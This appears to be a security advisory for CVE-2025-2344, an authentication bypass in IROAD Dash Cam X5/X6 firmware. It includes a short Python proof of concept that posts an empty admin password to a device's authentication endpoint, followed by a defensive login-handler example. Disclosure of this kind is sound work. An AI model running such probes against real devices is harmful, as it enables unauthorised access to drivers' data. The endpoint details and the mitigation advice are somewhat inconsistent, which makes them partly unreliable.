A vulnerability, classified as critical, has been discovered in IROAD Dash Cam X5 and Dash Cam X6 models with firmware versions up to 20250308. The affected component is the API Endpoint, whose exact purpose is currently unknown. The vulnerability allows authentication to be bypassed, enabling potential attackers to access user data and device information remotely. The vendor was contacted early about the disclosure but did not provide a response in any form.

Vulnerability Details

The API Endpoint component in certain IROAD Dash Cam models (X5 and X6) contains a weakness in its authentication process. This vulnerability allows attackers to bypass authentication altogether by manipulating the data being transmitted to the API Endpoint.

A code snippet showcasing the authentication bypass is as follows:

import requests

# Target endpoint; "target-ip" is a placeholder, the advisory gives no real address
url = "http://target-ip/api/v1/authenticate"

# Request body with the password field deliberately left empty
data = {
    "username": "admin",
    "password": ""
}

response = requests.post(url, json=data, timeout=10)

# A 200 response to an empty password indicates the flaw is present
if response.status_code == 200:
    print("Authentication bypass successful")
else:
    print("Authentication bypass failed")

This code sends a POST request to the API's authentication endpoint and intentionally leaves the password field empty. If the endpoint is vulnerable, it returns a successful authentication response (HTTP 200 status code) despite the empty password.
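Because the advisory does not describe the endpoint's server-side logic, the following is an added example (not IROAD's code) of how a handler for such an endpoint should treat the request above: any malformed or empty credential, including the empty-password body shown, is rejected with the same 401 before any password check, and the real check uses a salted hash compared in constant time. The user store, passphrase, iteration count and token format are constructed for the example.

```python
import hashlib
import hmac
import os
import secrets

ITERATIONS = 100_000  # constructed value; tune to the device's CPU budget


def _make_record(password: str) -> tuple[bytes, bytes]:
    """Derive a salted PBKDF2-SHA256 record for the in-memory user store."""
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed sample store: username -> (salt, hash). A device would load this
# from protected persistent storage, never from a hard-coded literal.
USERS = {"admin": _make_record("example-strong-passphrase")}


def authenticate(body: object) -> tuple[int, dict]:
    """Validate a /api/v1/authenticate request body.

    Returns (http_status, json_body). Every failure path returns the identical
    401 body so the response does not reveal whether the username exists.
    """
    fail = (401, {"error": "invalid credentials"})
    # Require a JSON object whose username and password are non-empty strings.
    if not isinstance(body, dict):
        return fail
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return fail
    if not username or not password:
        return fail  # the empty-password probe from the advisory stops here
    record = USERS.get(username)
    if record is None:
        # Burn equivalent work so unknown users are not cheaper to probe.
        hashlib.pbkdf2_hmac("sha256", password.encode(), b"\x00" * 16, ITERATIONS)
        return fail
    salt, expected = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    if not hmac.compare_digest(candidate, expected):
        return fail
    return 200, {"token": secrets.token_urlsafe(32)}


if __name__ == "__main__":
    # The advisory's probe body is rejected before any password comparison.
    print(authenticate({"username": "admin", "password": ""}))
```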

Exploitability

As the vulnerability can be exploited remotely, attackers could gain unauthorized access to an affected IROAD Dash Cam device, potentially accessing user data, manipulating device settings, or even disabling the device completely.

Vendor Communication

The vendor was notified about the critical vulnerability via email and given ample time to respond. However, they have not provided a response or issued a fix for the issue.


Mitigation

As there is currently no patch available from the vendor, users are encouraged to regularly update their IROAD Dash Cam device's firmware and monitor the IROAD website for any updates regarding this vulnerability. Furthermore, users should ensure that their device is physically secure and connected only to trusted networks.

Conclusion

CVE-2025-2344 represents a significant security risk for owners of affected IROAD Dash Cam models. As the vulnerability allows for authentication bypass, unauthorized remote access is possible, leading to data breaches and other potential harms. It is suggested that users follow the listed mitigation steps and maintain vigilance for any updates from the vendor regarding this issue.

Timeline

Published on: 03/16/2025 18:15:12 UTC